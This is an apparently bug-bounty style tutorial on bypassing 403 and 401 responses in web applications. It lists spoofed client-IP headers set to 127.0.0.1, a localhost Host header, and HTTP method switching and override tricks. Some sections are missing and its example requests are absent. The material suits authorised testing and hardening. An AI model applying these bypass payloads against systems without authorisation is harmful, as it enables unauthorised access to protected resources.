Methods to bypass 403 & 401

Hello Hackers, today in this write-up I am going to give you all things you need to know to bypass 403 & 401 error page, some automation tools, tips and tricks, medium articles, hackerone disclosed reports all the thing so let’s get started.

What is the difference between 403 & 401 Errors?

• 401 Unauthorized: This error indicates the need for authentication. It often appears when a user isn’t logged in or lacks permission to access the resource.

• 403 Forbidden: This code shows that while the server understands the request, it refuses to authorize it. Even an authenticated user might encounter this error due to permissions or IP restrictions.

Now I hope you understand the difference between 403 & 401 error message :) Now let’s dive into some techniques you can use to bypass:

2) Header Manipulation: In this method you can also use param Miner tool in burp suite to guess headers in the request. You can use following test cases:

Like if our get request looks something like this:

Now if application supports headers like x-original-url, x-rewrite-url etc. then you can test manually in this way in burp.

There are more headers you can use something like this:

· X-Originating-IP: 127.0.0.1

· X-Forwarded-For: 127.0.0.1

· X-Forwarded: 127.0.0.1

· Forwarded-For: 127.0.0.1

· X-Remote-IP: 127.0.0.1

· X-Remote-Addr: 127.0.0.1

· X-ProxyUser-Ip: 127.0.0.1

· X-Original-URL: 127.0.0.1

· Client-IP: 127.0.0.1

· True-Client-IP: 127.0.0.1

· Cluster-Client-IP: 127.0.0.1

· X-ProxyUser-Ip: 127.0.0.1

· Host: localhost

4) HTTP Method Switching: If you cannot access the resource using GET method then try to change the method like use HEAD, POST, PUT, TRACE, OPTIONS, DELETE, PATCH.

Request looks something like this:

Change method like this way:

If the application supports method override header then you can also test like this way:

Thus you can override the method and if WAF not configured properly then you can able to bypass.